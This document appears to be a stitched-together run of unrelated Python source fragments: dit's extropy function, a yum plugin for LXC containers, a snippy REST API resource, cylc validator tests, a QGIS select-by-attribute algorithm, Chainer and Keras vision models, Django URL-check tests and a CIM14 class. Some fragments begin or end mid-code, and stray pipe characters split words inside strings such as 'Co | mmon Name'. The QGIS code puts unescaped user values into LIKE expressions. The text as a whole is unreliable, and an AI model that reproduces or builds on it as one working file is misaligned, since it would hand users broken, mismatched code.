femobj['NodeLoadTable'] = FemMeshTools.get_force_obj_vertex_nodeload_table(self.femmesh, frc_obj)
elif femobj['RefShapeType'] == 'Edge': # line load on edges
femobj['NodeLoadTable'] = FemMeshTools.get_force_obj_edge_nodeload_table(self.femmesh, self.femelement_table, self.femnodes_mesh, frc_obj)
"""
The extropy
"""
from ..helpers import RV_MODES
from ..math.ops import get_ops
import numpy as np
def extropy(dist, rvs=None, rv_mode=None):
"""
Returns the extropy J[X] over the random variables in `rvs`.
If the distribution represents linear probabilities, then the extropy
is calculated with units of 'bits' (base-2).
Parameters
----------
dist : Distribution or float
The distribution from which the extropy is calculated. If a float,
then we calculate the binary extropy.
rvs : list, None
The indexes of the random variable used to calculate the extropy.
If None, then the extropy is calculated over all random variables.
This should remain `None` for ScalarDistributions.
rv_mode : str, None
Specifies how to interpret the elements of `rvs`. Valid options are:
{'indices', 'names'}. If equal to 'indices', then the elements of
`rvs` are interpreted as random variable indices. If equal to 'names',
then the elements are interpreted as random variable names. If `None`,
then the value of `dist._rv_mode` is consulted.
Returns
-------
J : float
The extropy of the distribution.
"""
try:
# Handle binary extropy.
float(dist)
except TypeError:
pass
else:
# Assume linear probability for binary extropy.
import dit
dist = dit.ScalarDistribution([dist, 1-dist])
rvs = None
rv_mode = RV_MODES.INDICES
if dist.is_joint():
if rvs is None:
# Default to the extropy of the entire distribution.
rvs = list(range(dist.outcome_length()))
rv_mode = RV_MODES.INDICES
d = dist.marginal(rvs, rv_mode=rv_mode)
else:
d = dist
pmf = d.pmf
if d.is_log():
base = d.get_base(numerical=True)
npmf = d.ops.log(1-d.ops.exp(pmf))
terms = -base**npmf * npmf
else:
# Calculate extropy in bits.
log = get_ops(2).log
npmf = 1 - pmf
terms = -npmf * log(npmf)
J = np.nansum(terms)
return J
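# Worked check (requires the dit package for ScalarDistribution): a fair coin
# has extropy J = -2 * (0.5 * log2(0.5)) = 1 bit, which for the binary case
# coincides with the entropy.
#
#   extropy(0.5)  # -> 1.0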
# Yum plugin to re-patch container rootfs after a yum update is done
#
# Copyright (C) 2012 Oracle
#
# Authors:
# Dwight Engen <dwight.engen@oracle.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
import os
from fnmatch import fnmatch
from yum.plugins import TYPE_INTERACTIVE
from yum.plugins import PluginYumExit
requires_api_version = '2.0'
plugin_type = (TYPE_INTERACTIVE,)
def posttrans_hook(conduit):
pkgs = []
patch_required = False
# If we aren't root, we can't have updated anything
if os.geteuid():
return
# See what packages have files that were patched
confpkgs = conduit.confString('main', 'packages')
if not confpkgs:
return
tmp = confpkgs.split(",")
for confpkg in tmp:
pkgs.append(confpkg.strip())
conduit.info(2, "lxc-patch: checking if updated pkgs need patching...")
ts = conduit.getTsInfo()
for tsmem in ts.getMembers():
for pkg in pkgs:
if fnmatch(pkg, tsmem.po.name):
patch_required = True
if patch_required:
conduit.info(2, "lxc-patch: patching container...")
os.spawnlp(os.P_WAIT, "lxc-patch", "lxc-patch", "--patch", "/")
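# The package list comes from the plugin's own configuration; a matching
# /etc/yum/pluginconf.d/lxc-patch.conf would look something like this
# (illustrative values, not the shipped defaults):
#
#   [main]
#   enabled=1
#   packages=pam,initscripts,*systemd*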
# -*- coding: utf-8 -*-
#
# SPDX-License-Identifier: AGPL-3.0-or-later
#
# snippy - software development and maintenance notes manager.
# Copyright 2017-2020 Heikki J. Laaksonen <laaksonen.heikki.j@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""api_fields: JSON REST API for resource attributes."""
from snippy.cause import Cause
from snippy.config.config import Config
from snippy.config.source.api import Api
from snippy.constants import Constants as Const
from snippy.logger import Logger
from snippy.server.rest.base import ApiResource
from snippy.server.rest.base import ApiNotImplemented
from snippy.server.rest.generate import Generate
class ApiAttributes(object):
"""Access unique resource attributes."""
def __init__(self, content):
self._logger = Logger.get_logger(__name__)
self._category = content.category
self._content = content
@Logger.timeit(refresh_oid=True)
def on_get(self, request, response):
"""Search unique resource attributes.
Search is made from all content categories by default.
Args:
request (obj): Falcon Request().
response (obj): Falcon Response().
"""
self._logger.debug('run: %s %s', request.method, request.uri)
if 'scat' not in request.params:
request.params['scat'] = Const.CATEGORIES
api = Api(self._category, Api.UNIQUE, request.params)
Config.load(api)
self._content.run()
if not self._content.uniques:
Cause.push(Cause.HTTP_NOT_FOUND, 'cannot find unique fields for %s attribute' % self._category)
if Cause.is_ok():
response.content_type = ApiResource.MEDIA_JSON_API
response.body = Generate.fields(self._category, self._content.uniques, request, response)
response.status = Cause.http_status()
else:
response.content_type = ApiResource.MEDIA_JSON_API
response.body = Generate.error(Cause.json_message())
response.status = Cause.http_status()
Cause.reset()
self._logger.debug('end: %s %s', request.method, request.uri)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_post(request, response):
"""Create new field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_put(request, response):
"""Change field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_delete(request, response):
"""Delete field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_options(_, response):
"""Respond with allowed methods."""
response.status = Cause.HTTP_200
response.set_header('Allow', 'GET,OPTIONS')
with pytest.raises(IllegalValueError):
validator.coerce_boolean(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('3', 3.0),
('9.80', 9.80),
('3.141592654', 3.141592654),
('"3.141592654"', 3.141592654),
("'3.141592654'", 3.141592654),
('-3', -3.0),
('-3.1', -3.1),
('0', 0.0),
('-0', -0.0),
('0.0', 0.0),
('1e20', 1.0e20),
('6.02e23', 6.02e23),
('-1.6021765e-19', -1.6021765e-19),
('6.62607004e-34', 6.62607004e-34),
]
)
def test_coerce_float(value: str, expected: float):
"""Test coerce_float."""
assert (
ParsecValidator.coerce_float(value, ['whatever']) == approx(expected)
)
def test_coerce_float__empty():
# not a number
assert ParsecValidator.coerce_float('', ['whatever']) is None
@pytest.mark.parametrize(
'value',
['None', ' Who cares? ', 'True', '[]', '[3.14]', '3.14, 2.72']
)
def test_coerce_float__bad(value: str):
with pytest.raises(IllegalValueError):
ParsecValidator.coerce_float(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('', []),
('3', [3.0]),
('2*3.141592654', [3.141592654, 3.141592654]),
('12*8, 8*12.0', [8.0] * 12 + [12.0] * 8),
('-3, -2, -1, -0.0, 1.0', [-3.0, -2.0, -1.0, -0.0, 1.0]),
('6.02e23, -1.6021765e-19, 6.62607004e-34',
[6.02e23, -1.6021765e-19, 6.62607004e-34]),
]
)
def test_coerce_float_list(value: str, expected: List[float]):
"""Test coerce_float_list."""
items = ParsecValidator.coerce_float_list(value, ['whatever'])
assert items == approx(expected)
@pytest.mark.parametrize(
'value',
['None', 'e, i, e, i, o', '[]', '[3.14]', 'pi, 2.72', '2*True']
)
def test_coerce_float_list__bad(value: str):
with pytest.raises(IllegalValueError):
ParsecValidator.coerce_float_list(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('0', 0),
('3', 3),
('-3', -3),
('-0', -0),
('653456', 653456),
('-8362583645365', -8362583645365)
]
)
def test_coerce_int(value: str, expected: int):
"""Test coerce_int."""
assert ParsecValidator.coerce_int(value, ['whatever']) == expected
def test_coerce_int__empty():
assert ParsecValidator.coerce_int('', ['whatever']) is None # not a number
@pytest.mark.parametrize(
'value',
['None', ' Who cares? ', 'True', '4.8', '[]', '[3]', '60*60']
)
def test_coerce_int__bad(value: str):
with pytest.raises(IllegalValueError):
ParsecValidator.coerce_int(value, ['whatever'])
def test_coerce_int_list():
"""Test coerce_int_list."""
validator = ParsecValidator()
# The good
for value, results in [
('', []),
('3', [3]),
('1..10, 11..20..2',
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19]),
('18 .. 24', [18, 19, 20, 21, 22, 23, 24]),
('18 .. 24 .. 3', [18, 21, 24]),
('-10..10..3', [-10, -7, -4, -1, 2, 5, 8]),
('10*3, 4*-6', [3] * 10 + [-6] * 4),
('10*128, -78..-72, 2048',
[128] * 10 + [-78, -77, -76, -75, -74, -73, -72, 2048])
]:
assert validator.coerce_int_list(value, ['whatever']) == results
# The bad
for value in [
'None', 'e, i, e, i, o', '[]', '1..3, x', 'one..ten'
]:
with pytest.raises(IllegalValueError):
validator.coerce_int_list(value, ['whatever'])
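# The tests above exercise a small list DSL: comma-separated items where
# "N*value" repeats a value N times and "a..b[..step]" expands an inclusive
# integer range. A minimal sketch of that expansion (illustrative only, not
# Parsec's actual implementation):
def expand_int_list(value):
    items = []
    for token in filter(None, (t.strip() for t in value.split(','))):
        if '..' in token:
            parts = [int(p) for p in token.split('..')]
            step = parts[2] if len(parts) > 2 else 1
            items.extend(range(parts[0], parts[1] + 1, step))
        elif '*' in token:
            count, _, item = token.partition('*')
            items.extend([int(item)] * int(count))
        else:
            items.append(int(token))
    return items
# e.g. expand_int_list('18 .. 24 .. 3') == [18, 21, 24]
#      expand_int_list('10*3, 4*-6') == [3] * 10 + [-6] * 4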
def test_coerce_str():
"""Test coerce_str."""
validator = ParsecValidator()
# The good
for value, result in [
('', ''),
('Hello World!', 'Hello World!'),
('"Hello World!"', 'Hello World!'),
('"Hello Cylc\'s World!"', 'Hello Cylc\'s World!'),
("'Hello World!'", 'Hello World!'),
('0', '0'),
('My list is:\nfoo, bar, baz\n', 'My list is:\nfoo, bar, baz'),
(' Hello:\n foo\n bar\n baz\n',
'Hello:\nfoo\nbar\nbaz'),
(' Hello:\n foo\n Greet\n baz\n',
'Hello:\n foo\nGreet\n baz'),
('False', 'False'),
('None', 'None'),
(['a', 'b'], 'a\nb')
]:
assert validator.coerce_str(value, ['whatever']) == result
def test_coerce_str_list():
"""Test coerce_str_list."""
validator = ParsecValidator()
# The good
for value, results in [
('', []),
('Hello', ['Hello']),
('"Hello"', ['Hello']),
('1', ['1']),
('Mercury, Venus, Earth, Mars',
['Mercury', 'Venus', 'Earth', 'Mars']),
('Mercury, Venus, Earth, Mars,\n"Jupiter",\n"Saturn"\n',
['Mercury', 'Venus', 'Earth', 'Mars', 'Jupiter', 'Saturn']),
('New Zealand, United Kingdom',
['New Zealand', 'United Kingdom'])
]:
assert validator.coerce_str_list(value, ['whatever']) == results
def test_strip_and_unquote():
with pytest.raises(IllegalValueError):
ParsecValidator.strip_and_unquote(['a'], '"""')
def test_strip_and_unquote_list_parsec():
"""Test strip_and_unquote_list using ParsecValidator."""
for value, results in [
('"a"\n"b"', ['a', 'b']),
('"a", "b"', ['a', 'b']),
('"a", "b"', ['a', 'b']),
('"c" # d', ['c']),
('"a", "b", "c" # d', ['a', 'b', 'c']),
('"a"\n"b"\n"c" # d', ['a', 'b', 'c']),
("'a', 'b'", ['a', 'b']),
("'c' #d", ['c']),
("'a', 'b', 'c' # d", ['a', 'b', 'c']),
("'a'\n'b'\n'c' # d", ['a', 'b', 'c']),
('a, b, c,', ['a', 'b', 'c']),
('a, b, c # d', ['a', 'b', 'c']),
('a, b, c\n"d"', ['a', 'b', 'd']),
('a, b, c\n"d" # e', ['a', 'b', '"d"'])
]:
assert results == ParsecValidator.strip_and_unquote_list(
['a'], value)
def test_strip_and_unquote_list_cylc(strip_and_unquote_list):
"""Test strip_and_unquote_list using CylcConfigValidator."""
validator = VDR()
for values in strip_and_unquote_list:
value = values[0]
expected = values[1]
output = validator.strip_and_unquote_list(keys=[], value=value)
assert expected == output
def test_strip_and_unquote_list_multiparam():
with pytest.raises(ListValueError):
ParsecValidator.strip_and_unquote_list(
['a'], 'a, b, c<a,b>'
)
def test_coerce_cycle_point():
"""Test coerce_cycle_point."""
validator = VDR()
# The good
for value, result in [
('', None),
('3', '3'),
('2018', '2018'),
('20181225T12Z', '20181225T12Z'),
('2018-12-25T12:00+11:00', '2018-12-25T12:00+11:00')]:
assert validator.coerce_cycle_point(value, ['whatever']) == result
# The bad
for value in [
'None', ' Who cares? ', 'True', '1, 2', '20781340E10']:
with pytest.raises(IllegalValueError):
validator.coerce_cycle_point(value, ['whatever'])
def test_coerce_cycle_point_format():
"""Test coerce_cycle_point_format."""
validator = VDR()
# The good
for value, result in [
('', None),
('%Y%m%dT%H%M%z', '%Y%m%dT%H%M%z'),
('CCYYMMDDThhmmZ', 'CCYYMMDDThhmmZ'),
('XCCYYMMDDThhmmZ', 'XCCYYMMDDThhmmZ')]:
assert (
validator.coerce_cycle_point_format(value, ['whatever'])
== result
)
# The bad
# '/' and ':' not allowed in cylc cycle points (they are used in paths).
for value in ['%i%j', 'Y/M/D', '%Y-%m-%dT%H:%MZ']:
with pytest.raises(IllegalValueError):
validator.coerce_cycle_point_format(value, ['whatever'])
def test_coerce_cycle_point_time_zone():
"""Test coerce_cycle_point_time_zone."""
validator = VDR()
# The good
for value, result in [
('', None),
('Z', 'Z'),
('+0000', '+0000'),
('+0100', '+0100'),
('+1300', '+1300'),
('-0630', '-0630')]:
assert (
validator.coerce_cycle_point_time_zone(value, ['whatever'])
== result
)
# The bad
    for value in ['None']:
        with pytest.raises(IllegalValueError):
            validator.coerce_cycle_point_time_zone(value, ['whatever'])
import click
from arrow.cli import pass_context, json_loads
from arrow.decorators import custom_exception, dict_output
@click.command('get_comments')
@click.argument("feature_id", type=str)
@click.option(
"--organism",
help="Organism Co | mmon Name",
type=str
)
@click.option(
"--sequence",
help="Sequence Name",
type=str
)
@pass_context
@custom_exception
@dict_output
def cli(ctx, feature_id, organism="", sequence=""):
"""Get a feature's comments
Output:
A standard apollo feature dictionary ({"features": [{...}]})
"""
    return ctx.gi.annotations.get_comments(feature_id, organism=organism, sequence=sequence)
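# Hypothetical shell invocation of the command above (the feature ID and
# names are illustrative; assumes the arrow CLI entry point is installed):
#     arrow annotations get_comments "feature-uuid" --organism "Homo sapiens"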
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
SelectByAttribute.py
---------------------
Date : May 2010
Copyright : (C) 2010 by Michael Minn
Email : pyqgis at michaelminn dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Michael Minn'
__date__ = 'May 2010'
__copyright__ = '(C) 2010, Michael Minn'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from qgis.PyQt.QtCore import QVariant
from qgis.core import (QgsExpression,
QgsProcessingException,
QgsProcessingParameterVectorLayer,
QgsProcessingParameterField,
QgsProcessingParameterEnum,
QgsProcessingParameterString,
QgsProcessingOutputVectorLayer)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
class SelectByAttribute(QgisAlgorithm):
INPUT = 'INPUT'
FIELD = 'FIELD'
OPERATOR = 'OPERATOR'
VALUE = 'VALUE'
OUTPUT = 'OUTPUT'
OPERATORS = ['=',
'!=',
'>',
'>=',
'<',
'<=',
'begins with',
'contains',
'is null',
'is not null',
                 'does not contain'
]
STRING_OPERATORS = ['begins with',
'contains',
'does not contain']
def tags(self):
return self.tr('select,attribute,value,contains,null,field').split(',')
def group(self):
return self.tr('Vector selection')
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
        self.i18n_operators = ['=',
'!=',
'>',
'>=',
'<',
'<=',
self.tr('begins with'),
self.tr('contains'),
self.tr('is null'),
self.tr('is not null'),
self.tr('does not contain')
]
self.addParameter(QgsProcessingParameterVectorLayer(self.INPUT, self.tr('Input layer')))
self.addParameter(QgsProcessingParameterField(self.FIELD,
self.tr('Selection attribute'), parentLayerParameterName=self.INPUT))
self.addParameter(QgsProcessingParameterEnum(self.OPERATOR,
self.tr('Operator'), self.i18n_operators))
self.addParameter(QgsProcessingParameterString(self.VALUE, self.tr('Value')))
self.addOutput(QgsProcessingOutputVectorLayer(self.OUTPUT, self.tr('Selected (attribute)')))
def name(self):
return 'selectbyattribute'
def displayName(self):
return self.tr('Select by attribute')
def processAlgorithm(self, parameters, context, feedback):
layer = self.parameterAsVectorLayer(parameters, self.INPUT, context)
fieldName = self.parameterAsString(parameters, self.FIELD, context)
operator = self.OPERATORS[self.parameterAsEnum(parameters, self.OPERATOR, context)]
value = self.parameterAsString(parameters, self.VALUE, context)
fields = layer.fields()
idx = layer.fields().lookupField(fieldName)
fieldType = fields[idx].type()
if fieldType != QVariant.String and operator in self.STRING_OPERATORS:
op = ''.join(['"%s", ' % o for o in self.STRING_OPERATORS])
raise QgsProcessingException(
self.tr('Operators {0} can be used only with string fields.').format(op))
field_ref = QgsExpression.quotedColumnRef(fieldName)
quoted_val = QgsExpression.quotedValue(value)
if operator == 'is null':
expression_string = '{} IS NULL'.format(field_ref)
elif operator == 'is not null':
expression_string = '{} IS NOT NULL'.format(field_ref)
elif operator == 'begins with':
expression_string = """%s LIKE '%s%%'""" % (field_ref, value)
elif operator == 'contains':
expression_string = """%s LIKE '%%%s%%'""" % (field_ref, value)
elif operator == 'does not contain':
expression_string = """%s NOT LIKE '%%%s%%'""" % (field_ref, value)
else:
expression_string = '{} {} {}'.format(field_ref, operator, quoted_val)
expression = QgsExpression(expression_string)
if expression.hasParserError():
raise QgsProcessingException(expression.parserErrorString())
layer.selectByExpression(expression_string)
return {self.OUTPUT: parameters[self.INPUT]}
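# For concreteness, the expression strings the branches above would build
# for a field "name" and the value Paris (note that the three LIKE branches
# interpolate the raw value, so quotes and % wildcards in it are not escaped
# the way quotedValue() escapes them in the default branch):
#     '='            ->  "name" = 'Paris'
#     'begins with'  ->  "name" LIKE 'Paris%'
#     'contains'     ->  "name" LIKE '%Paris%'
#     'is null'      ->  "name" IS NULL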
|
import chainer
import chainer.functions as F
import chainer.links as L
class vgga(chainer.Chain):
insize = 224
def __init__(self):
super(vgga, self).__init__()
with self.init_scope():
self.conv1 = L.Convolution2D( 3, 64, 3, stride=1, pad=1)
self.conv2 = L.Convolution2D( 64, 128, 3, stride=1, pad=1)
self.conv3 = L.Convolution2D(128, 256, 3, stride=1, pad=1)
self.conv4 = L.Convolution2D(256, 256, 3, stride=1, pad=1)
self.conv5 = L.Convolution2D(256, 512, 3, stride=1, pad=1)
self.conv6 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.conv7 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.conv8 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.fc6 = L.Linear(512 * 7 * 7, 4096)
self.fc7 = L.Linear(4096, 4096)
self.fc8 = L.Linear(4096, 1000)
def forward(self, x):
h = F.max_pooling_2d(F.relu(self.conv1(x)), 2, stride=2)
        h = F.max_pooling_2d(F.relu(self.conv2(h)), 2, stride=2)
h = F.relu(self.conv3(h))
h = F.max_pooling_2d(F.relu(self.conv4(h)), 2, stride=2)
h = F.relu(self.conv5(h))
h = F.max_pooling_2d(F.relu(self.conv6(h)), 2, stride=2)
        h = F.relu(self.conv7(h))
h = F.max_pooling_2d(F.relu(self.conv8(h)), 2, stride=2)
h = F.relu(self.fc6(h))
h = F.relu(self.fc7(h))
return self.fc8(h)
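# Minimal usage sketch (illustrative; assumes Chainer and NumPy are
# installed, and a zero image stands in for real input):
if __name__ == '__main__':
    import numpy as np
    model = vgga()
    x = np.zeros((1, 3, vgga.insize, vgga.insize), dtype=np.float32)
    y = model.forward(x)  # chainer.Variable with shape (1, 1000)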
|
from django.core.checks.urls import check_url_config
from django.test import SimpleTestCase
from django.test.utils import override_settings
class CheckUrlsTest(SimpleTestCase):
@override_settings(ROOT_URLCONF='check_framework.urls_no_warnings')
def test_include_no_warnings(self):
result = check_url_config(None)
self.assertEqual(result, [])
@override_settings(ROOT_URLCONF='check_framework.urls_include')
def test_include_with_dollar(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W001')
expected_msg = "Your URL pattern '^include-with-dollar$' uses include with a regex ending with a '$'."
self.assertIn(expected_msg, warning.msg)
@override_settings(ROOT_URLCONF='check_framework.urls_slash')
def test_url_beginning_with_slash(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W002')
expected_msg = "Your URL pattern '/starting-with-slash/$' has a regex beginning with a '/'"
self.assertIn(expected_msg, warning.msg)
@override_settings(ROOT_URLCONF='check_framework.urls_name')
def test_url_pattern_name_with_colon(self):
result = check_url_config(None)
        self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W003')
expected_msg = "Your URL pattern '^$' [name='name_with:colon'] has a name including a ':'."
        self.assertIn(expected_msg, warning.msg)
|
"""Find all models written by user Hut | ton, including the DOI and the
source code repository for each model.
"""
from ask_api_examples import make_query
query = '[[Last name::Hutton]]|?DOI model|?Source web address'
def main():
r = make_query(query, __file__)
return r
if __name__ == '__main__':
print main()
|
genet" (pre-training on ImageNet).
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(299, 299, 3)`.
It should have exactly 3 inputs channels,
and width and height should be no smaller than 71.
E.g. `(150, 150, 3)` would be one valid value.
pooling: Optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional layer.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional layer, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
# Returns
A Keras model instance.
# Raises
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
RuntimeError: If attempting to run this model with a
backend that does not support separable convolutions.
"""
if weights not in {'imagenet', None}:
raise ValueError('The `weights` argument should be either '
'`None` (random initialization) or `imagenet` '
'(pre-training on ImageNet).')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as imagenet with `include_top`'
' as true, `classes` should be 1000')
if K.backend() != 'tensorflow':
raise RuntimeError('The Xception model is only available with '
'the TensorFlow backend.')
if K.image_data_format() != 'channels_last':
warnings.warn('The Xception model is only available for the '
'input data format "channels_last" '
'(width, height, channels). '
'However your settings specify the default '
'data format "channels_first" (channels, width, height). '
                      'You should set `image_data_format="channels_last"` in your Keras '
'config located at ~/.keras/keras.json. '
'The model being returned right now will expect inputs '
'to follow the "channels_last" data format.')
K.set_image_data_format('channels_last')
old_data_format = 'channels_first'
else:
old_data_format = None
# Determine proper input shape
input_shape = _obtain_input_shape(input_shape,
default_size=299,
                                      min_size=71,
data_format=K.image_data_format(),
include_top=include_top)
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
x = Conv2D(32, (3, 3), strides=(2, 2), use_bias=False, name='block1_conv1')(img_input)
x = BatchNormalization(name='block1_conv1_bn')(x)
x = Activation('relu', name='block1_conv1_act')(x)
x = Conv2D(64, (3, 3), use_bias=False, name='block1_conv2')(x)
x = BatchNormalization(name='block1_conv2_bn')(x)
x = Activation('relu', name='block1_conv2_act')(x)
residual = Conv2D(128, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = SeparableConv2D(128, (3, 3), padding='same', use_bias=False, name='block2_sepconv1')(x)
x = BatchNormalization(name='block2_sepconv1_bn')(x)
x = Activation('relu', name='block2_sepconv2_act')(x)
x = SeparableConv2D(128, (3, 3), padding='same', use_bias=False, name='block2_sepconv2')(x)
x = BatchNormalization(name='block2_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block2_pool')(x)
x = layers.add([x, residual])
residual = Conv2D(256, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block3_sepconv1_act')(x)
x = SeparableConv2D(256, (3, 3), padding='same', use_bias=False, name='block3_sepconv1')(x)
x = BatchNormalization(name='block3_sepconv1_bn')(x)
x = Activation('relu', name='block3_sepconv2_act')(x)
x = SeparableConv2D(256, (3, 3), padding='same', use_bias=False, name='block3_sepconv2')(x)
x = BatchNormalization(name='block3_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block3_pool')(x)
x = layers.add([x, residual])
residual = Conv2D(728, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block4_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block4_sepconv1')(x)
x = BatchNormalization(name='block4_sepconv1_bn')(x)
x = Activation('relu', name='block4_sepconv2_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block4_sepconv2')(x)
x = BatchNormalization(name='block4_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block4_pool')(x)
x = layers.add([x, residual])
for i in range(8):
residual = x
prefix = 'block' + str(i + 5)
x = Activation('relu', name=prefix + '_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name=prefix + '_sepconv1')(x)
x = BatchNormalization(name=prefix + '_sepconv1_bn')(x)
x = Activation('relu', name=prefix + '_sepconv2_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name=prefix + '_sepconv2')(x)
x = BatchNormalization(name=prefix + '_sepconv2_bn')(x)
x = Activation('relu', name=prefix + '_sepconv3_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name=prefix + '_sepconv3')(x)
x = BatchNormalization(name=prefix + '_sepconv3_bn')(x)
x = layers.add([x, residual])
residual = Conv2D(1024, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block13_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block13_sepconv1')(x)
x = BatchNormalization(name='block13_sepconv1_bn')(x)
x = Activation('relu', name='block13_sepconv2_act')(x)
x = SeparableConv2D(1024, (3, 3), padding='same', use_bias=False, name='block13_sepconv2')(x)
x = BatchNormalization(name='block13_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block13_pool')(x)
x = layers.add([x, residual])
x = SeparableConv2D(1536, (3, 3), padding='same', use_bias=False, name='block14_sepconv1')(x)
x = BatchNormalization(name='block14_sepconv1_bn')(x)
x = Activation('relu', name='block14_sepconv1_act')(x)
x = SeparableConv2D(2048, (3, 3), padding='same', use_bias=False, name='block14_sepconv2')(x)
x = BatchNormalization(name='block14_sepconv2_bn')(x)
x = Activation('relu', name='block14_sepconv2_act')(x)
if include_top:
x = GlobalAveragePooling2D(name='avg_pool')(x)
x = Dense(classes, activation='softmax', name='predictions')(x)
else:
if pooling == 'avg':
x = GlobalAveragePooling2D()(x)
elif pooling == 'max':
            x = GlobalMaxPooling2D()(x)
|
def f():
try:
        a = 1
except:
        b = 1
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.Element import Element
class LineDetail(Element):
"""Details on an amount line, with rounding, date and note.
"""
def __init__(self, dateTime='', rounding=0.0, note='', amount=0.0, *args, **kw_args):
"""Initialises a new 'LineDetail' instance.
        @param dateTime: Date and time when this line was created in the application process.
@param rounding: Totalised monetary value of all errors due to process rounding or truncating that is not reflected in 'amount'.
@param note: Free format note relevant to this line.
@param amount: Amount for this line item.
"""
#: Date and time when this line was created in the application process.
self.dateTime = dateTime
        #: Totalised monetary value of all errors due to process rounding or truncating that is not reflected in 'amount'.
self.rounding = rounding
#: Free format note relevant to this line.
self.note = note
#: Amount for this line item.
self.amount = amount
super(LineDetail, self).__init__(*args, **kw_args)
_attrs = ["dateTime", "rounding", "note", "amount"]
_attr_types = {"dateTime": str, "rounding": float, "note": str, "amount": float}
